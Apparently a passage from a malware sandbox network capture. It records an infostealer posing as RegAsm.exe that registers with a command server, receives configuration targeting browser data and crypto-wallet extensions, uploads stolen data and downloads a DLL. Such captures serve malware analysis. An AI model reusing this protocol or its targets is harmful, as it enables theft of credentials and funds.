https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 21 Sep 2024 12:49:44 GMT Content-Length: 34740 Connection: close Set-Cookie: sessionid=080ec9ec65033f7fcde8d2ff; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-21 12:49:44 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-21 12:49:44 UTC	10062	IN	Data Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
2024-09-21 12:49:44 UTC	10164	IN	Data Raw: 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 Data Ascii: mmunity.akamai.steamstatic.com\/","COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.9	49792	116.203.165.127	443	1136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:45 UTC	188	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:46 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.9	49796	116.203.165.127	443	1136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:48 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:48 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 37 34 34 39 39 44 41 42 36 45 32 33 37 31 35 34 33 35 31 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 2d 2d 0d Data Ascii: ------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="hwid"7074499DAB6E2371543510-a33c7340-61ca------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------BKJDGCGDAAAKECAKKJDA--
2024-09-21 12:49:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:48 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|52e5394e0ffaa1c51925944d53f55a57\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.9	49799	116.203.165.127	443	1136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:50 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:50 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="token"52e5394e0ffaa1c51925944d53f55a57------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------DGDHJEGIEBFHDGDGHDHICont
2024-09-21 12:49:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:50 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.9	49801	116.203.165.127	443	1136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:51 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:51 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="token"52e5394e0ffaa1c51925944d53f55a57------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------FCGIJDBAFCBAAKECGDGCCont
2024-09-21 12:49:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:52 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.9	49805	116.203.165.127	443	1136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:54 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:54 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------KKJEBAAECBGDHIECAKJKContent-Disposition: form-data; name="token"52e5394e0ffaa1c51925944d53f55a57------KKJEBAAECBGDHIECAKJKContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------KKJEBAAECBGDHIECAKJKCont
2024-09-21 12:49:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:55 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.9	49812	116.203.165.127	443	1136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:59 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 6581 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:59 UTC	6581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"52e5394e0ffaa1c51925944d53f55a57------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------HIDHIEGIIIECAKEBFBAACont
2024-09-21 12:50:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:50:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:50:00 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.9	49813	116.203.165.127	443	1136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:50:00 UTC	196	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:50:00 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:50:00 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Saturday, 21-Sep-2024 12:50:00 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 12:50:00 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-21 12:50:00 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-21 12:50:00 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-21 12:50:00 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-21 12:50:00 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ 